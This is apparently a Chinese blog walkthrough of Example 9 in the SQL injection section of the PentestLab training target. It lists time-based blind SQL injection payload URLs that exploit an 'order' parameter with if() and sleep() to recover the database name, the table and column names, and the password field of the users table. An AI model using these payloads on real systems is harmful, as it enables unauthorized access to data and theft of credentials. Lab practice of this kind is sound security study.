PentestLab-web安全SQL注入-EXP9

原创

最爱大苹果 2023-03-21 15:29:36 博主文章分类：WEB信息安全技术 ©著作权

文章标签 sql php ci 文章分类 网络安全 yyds干货盘点

©著作权归作者所有：来自51CTO博客作者最爱大苹果的原创作品，请联系作者获取转载授权，否则将追究法律责任

我们打开靶机，选择“SQL Injections”

选择“Example9”

PentestLab-web安全SQL注入-EXP9_php

观察页面

PentestLab-web安全SQL注入-EXP9_sql_02

盲注的方法如下：

无回显，使用延时注入
注入点
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23

payload为

http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr(database(),1,1))>101,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>118,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 1,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 0,1),1,1))>105,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select passwd from users  limit 0,1))>5,sleep(10),1)%23

观察靶机的源代码

PentestLab-web安全SQL注入-EXP9_ci_03